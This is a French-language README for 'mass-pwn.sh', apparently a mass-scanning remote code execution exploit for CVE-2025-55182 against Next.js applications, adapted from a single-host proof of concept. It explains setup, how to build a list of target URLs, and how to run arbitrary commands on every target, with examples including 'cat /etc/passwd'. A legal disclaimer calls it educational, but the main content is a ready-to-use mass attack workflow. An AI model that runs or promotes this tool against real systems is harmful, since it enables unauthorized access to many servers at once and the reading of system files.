
Charge utile CVE-2025-55182
Un script d'exploit RCE massif modifié pour CVE-2025-55182 (React2Shell) ciblant les applications Next.js.
Cet outil est une modification du script PoC original de pax-k. Alors que le script original cible un seul hôte, cette version est améliorée pour prendre en charge le scan massif à partir d'une liste d'URLs, en automatisant l'injection de payload, l'exécution de commandes et l'analyse de la sortie pour une évaluation efficace des vulnérabilités.
list.txt).curl, openssl et les utilitaires bash standard.Un grand merci aux chercheurs en sécurité et aux équipes qui ont découvert cette vulnérabilité :
Assurez-vous d'avoir un environnement Linux (Kali Linux, Ubuntu, etc.) avec les éléments suivants installés :
bashcurlopensslgrep & cutClonez ou téléchargez le script.
Rendez le script exécutable :
chmod +x mass-pwn.sh
Créez un fichier texte (par exemple, list.txt) et ajoutez vos URLs cibles ligne par ligne. Assurez-vous d'inclure le protocole (http:// ou https://).
nano list.txt
Format :
Plaintext
[https://target-one.com](https://target-one.com)
[http://vulnerable-site.net](http://vulnerable-site.net)
[https://testing.corp.local:3000](https://testing.corp.local:3000)
2. Exécuter l'exploit
Exécutez le script en fournissant le fichier de liste des cibles et la commande à exécuter.
Syntaxe :
Bash
./mass-pwn.sh <fichier_liste> "<commande>"
Exemples :
Vérifier l'utilisateur actuel sur toutes les cibles :
Bash
./mass-pwn.sh list.txt "whoami"
Vérifier le nom d'hôte :
Bash
./mass-pwn.sh list.txt "hostname"
Tenter de lire des fichiers système (si vulnérable) :
Bash
./mass-pwn.sh list.txt "cat /etc/passwd"
⚠️ Avertissement légal
À DES FINS ÉDUCATIVES UNIQUEMENT.
Cet outil est développé et distribué uniquement pour la recherche en sécurité, les tests de pénétration autorisés et les fins éducatives.
Aucune responsabilité : L'auteur et les contributeurs ne sont PAS responsables des dommages, pertes de données, compromissions de serveurs ou problèmes juridiques causés par une mauvaise utilisation de cet outil.
Aucune utilisation non autorisée : N'utilisez pas cet outil contre des systèmes, réseaux ou applications que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation écrite explicite de test.
Conséquences légales : L'accès non autorisé à des systèmes informatiques est illégal et puni par la loi. Vous êtes seul responsable de vos actions et des conséquences juridiques qui pourraient en découler.
En utilisant ce script, vous acceptez avoir compris ces termes et que vous n'utiliserez pas cet outil à des fins malveillantes.